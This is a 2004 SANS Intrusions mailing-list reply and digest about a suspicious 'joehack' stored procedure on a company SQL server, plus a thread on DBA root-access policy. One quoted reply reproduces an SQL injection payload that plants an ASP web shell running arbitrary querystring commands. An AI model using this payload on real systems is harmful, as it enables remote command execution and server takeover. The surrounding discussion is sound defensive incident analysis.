[Intrusions] Re: joehack, SQL and the 1433 Scans.... (Chris Norton)
Scott Sanders
Scott.Sanders at Toyota-fs.com
Fri Nov 12 14:34:56 GMT 2004
Chris,
The SQL server is accessible from a web based application; the SQL cluster
is a back-end database for a web based application. The web app is
accessible from an external network where the PC's have an internet
connection. We also have several VPN's to vendor networks that have access
to the SQL cluster; I assume that if there's internet access on the vendor
network, then the SQL server is accessible from here also, however all
traffic comes through our Pix firewalls.
The web based app is hosted on Windows 2000/IIS 5.0 servers, but the query
runs on a local SQL account that has a Public role on the database.
Thanks in advance...
Regards,
Scott Sanders
IT Operations
Europe & Africa Region
Toyota Financial Services (UK)
D +44 (0)1737 365512
F +44 (0)1737 365520
M +44 (0)7810 884614
E scott.sanders at toyota-fs.com
intrusions-request at lists.sans.org
Sent by: intrusions-bounces at lists.sans.org
12/11/2004 12:08
Please respond to
intrusions at lists.sans.org
To
intrusions at lists.sans.org
cc
Subject
Intrusions Digest, Vol 8, Issue 11
Send Intrusions mailing list submissions to
intrusions at lists.sans.org
To subscribe or unsubscribe via the World Wide Web, visit
http://www.dshield.org/mailman/listinfo/intrusions
or, via email, send a message with subject or body 'help' to
intrusions-request at lists.sans.org
You can reach the person managing the list at
intrusions-owner at lists.sans.org
When replying, please edit your Subject line so it is more specific
than "Re: Contents of Intrusions digest..."
Today's Topics:
1. Re: joehack, SQL and the 1433 Scans.... (Chris Norton)
2. Re: Requested opinions on Access. (Margles)
3. RE: Requested opinions on Access. (M. Shirk)
----------------------------------------------------------------------
Message: 1
Date: Thu, 11 Nov 2004 12:04:26 -0600
From: "Chris Norton" <kicktd_list at hotmail.com>
Subject: Re: [Intrusions] joehack, SQL and the 1433 Scans....
To: "Intrusions List \(GCIA Practicals\)" <intrusions at lists.sans.org>
Message-ID: <BAY22-DAV6101s7hpJm00018a75 at hotmail.com>
Content-Type: text/plain; charset="iso-8859-1"
Scott,
Is the database accessible from a website for example? The reason I ask is
this sounds like a SQL injection attempt or maybe someone got your MSSQL
user/pass somehow.
[Taken from Advanced SQL Injection In SQL Server Applications -
http://www.ngssoftware.com]
This example creates an ASP script that will run any command passed to it
in
the querystring:
-- scripting.filesystemobject example - create a 'run this' .asp file
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\inetpub\wwwroot\foo.asp',
1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<% set o = server.createobject("wscript.shell"): o.run(
request.querystring("cmd") ) %>'
It is important to note that when running on a Windows NT4, IIS4 platform,
commands issued by this ASP script will run as the 'system' account. In
IIS5, however, they will run as the low-privileged IWAM_xxx
--
Chris Norton
UAT Student Software Engineering Network Defense
----- Original Message -----
From: "Scott Sanders" <Scott.Sanders at Toyota-fs.com>
To: <intrusions at lists.sans.org>
Sent: Wednesday, November 10, 2004 1:55 AM
Subject: [Intrusions] joehack, SQL and the 1433 Scans....
> Hi there...
>
> I'm hoping somebody can help shed light on this issue as we have an
> identical situation here and I'm not having much luck gathering info on
> this.
>
> We have been investigating processor spikes on a SQL server and we have
> also found a stored procedure running with this 'joehack' string. The
> details are below:
>
> DECLARE @OUTPAR1 int
> execute sp_<removed string> @OUTPAR1 output
> select @OUTPAR1 'joehack'
>
> This seems to be running under a valid SQL account.
>
> Any advice is appreciated.
>
> Regards,
> Scott Sanders
> IT Operations
> Europe & Africa Region
> Toyota Financial Services (UK)
> D +44 (0)1737 365512
> F +44 (0)1737 365520
> M +44 (0)7810 884614
> E scott.sanders at toyota-fs.com
>
>
> This correspondence is for the intended recipient only. It may contain
> confidential or legally privileged information or both. No
> confidentiality or privilege is waived or lost by any mistransmission
> or unauthorised alteration during transmission.
>
> If you are not the intended recipient, any disclosure, copying,
> distribution or any action taken or omitted to be taken in reliance on
> it, is prohibited and may be unlawful. If you receive this
> correspondence in error, please immediately delete it from your system
> and notify the sender.
>
> Any views expressed in this message are those of the individual sender,
> except where the sender expressly, and with authority, states them to
> be the views of Toyota.
>
> This message has been checked for viruses but the recipient is strongly
> advised to rescan the message before opening any attachments or
> attached executable files.
> _______________________________________________
> Intrusions mailing list
> Intrusions at lists.sans.org
> http://www.dshield.org/mailman/listinfo/intrusions
>
------------------------------
Message: 2
Date: Thu, 11 Nov 2004 12:07:40 -0600
From: Margles <margles at gmail.com>
Subject: Re: [Intrusions] Requested opinions on Access.
To: "Intrusions List (GCIA Practicals)" <intrusions at lists.sans.org>
Message-ID: <f8d9ff62041111100741867cea at mail.gmail.com>
Content-Type: text/plain; charset=US-ASCII
installing and running a program such as crack
_without-explicit-authorization_ is usually grounds for being
fired... even if you are Security, which a DBA usually is not.
in my experience, understanding of security, paying attention to
timely patching, proper securing of accounts (including admin
accounts), good passwords, and other issues were all things that the
DBAs did not handle appropriately but complained about. luckily they
did not have admin rights over their workstations...
it came down to upper management support for proper separation of
duties, and respect for the folks responsible for security in the
different areas.
mas
On Wed, 10 Nov 2004 07:41:37 -0800, Wilson, Mark <wilsonm at emwd.org> wrote:
> Ladies and Gentlemen;
>
> I have an issue with our Data Base Admins (DBA's) wanting the root
passwords for their workstations. We had just recently a DBA run a crack
against a shadow file and move the shadow file from one of the Unix
machines to a PC.
>
> We staff separate Systems Administrators that normally admin these
workstations, and I have a "symbiotic" relation on security issues with
our SA's and trust them to perform necessary updates.
>
> Obvious issues aside, I would really like to hear about policies and
issues that others have in relation to DBA's having root access.
> These DBA's support our Oracle Financials. (ehhh shiver up my spine)
that hold all our customer financial information.
>
> I would really appreciate responses to this since it has become a very
touchy issue and I'm getting stuck in the middle being the Security
person.
>
> Thanks.
>
> Mark Wilson
> Communications Analyst / IT Security
> Eastern Municipal Water District
> 2270 Trumble Rd.
> Perris Ca. 92572
> 951.928.3777.4544
> www.emwd.org
>
> _______________________________________________
> Intrusions mailing list
> Intrusions at lists.sans.org
> http://www.dshield.org/mailman/listinfo/intrusions
>
------------------------------
Message: 3
Date: Thu, 11 Nov 2004 11:52:17 -0500
From: "M. Shirk" <shirkdog_linux at hotmail.com>
Subject: RE: [Intrusions] Requested opinions on Access.
To: intrusions at lists.sans.org
Message-ID: <BAY19-F34znOxbkK0rG0000928c at hotmail.com>
Content-Type: text/plain; format=flowed
This is grounds for dismissal or even prosecution (in the government I
would
say).
NIST Guidelines speak to Identification and Authentication. Basically, a
"Need to Know basis". Security
controls should be in place so separation of duties is possible. They are
DBA's and should never have
the ROOT password to any unix server. If they need admin privileges for
certain binaries or scripts, grant
them "Only what they Need", and nothing more.
However, if you have no security policy, they are free to do as they
please.
This is even the case if
today you go and install security controls like integrity checkers, host
based IDS, or any other techniques. There has to be a policy to hold
individuals accountable for their actions.
Shirkdog.
------------------------------
_______________________________________________
Intrusions mailing list
Intrusions at lists.sans.org
http://www.dshield.org/mailman/listinfo/intrusions
End of Intrusions Digest, Vol 8, Issue 11
*****************************************
This correspondence is for the intended recipient only. It may contain
confidential or legally privileged information or both. No
confidentiality or privilege is waived or lost by any mistransmission
or unauthorised alteration during transmission.
If you are not the intended recipient, any disclosure, copying,
distribution or any action taken or omitted to be taken in reliance on
it, is prohibited and may be unlawful. If you receive this
correspondence in error, please immediately delete it from your system
and notify the sender.
Any views expressed in this message are those of the individual sender,
except where the sender expressly, and with authority, states them to
be the views of Toyota.
This message has been checked for viruses but the recipient is strongly
advised to rescan the message before opening any attachments or
attached executable files.
More information about the Intrusions
mailing list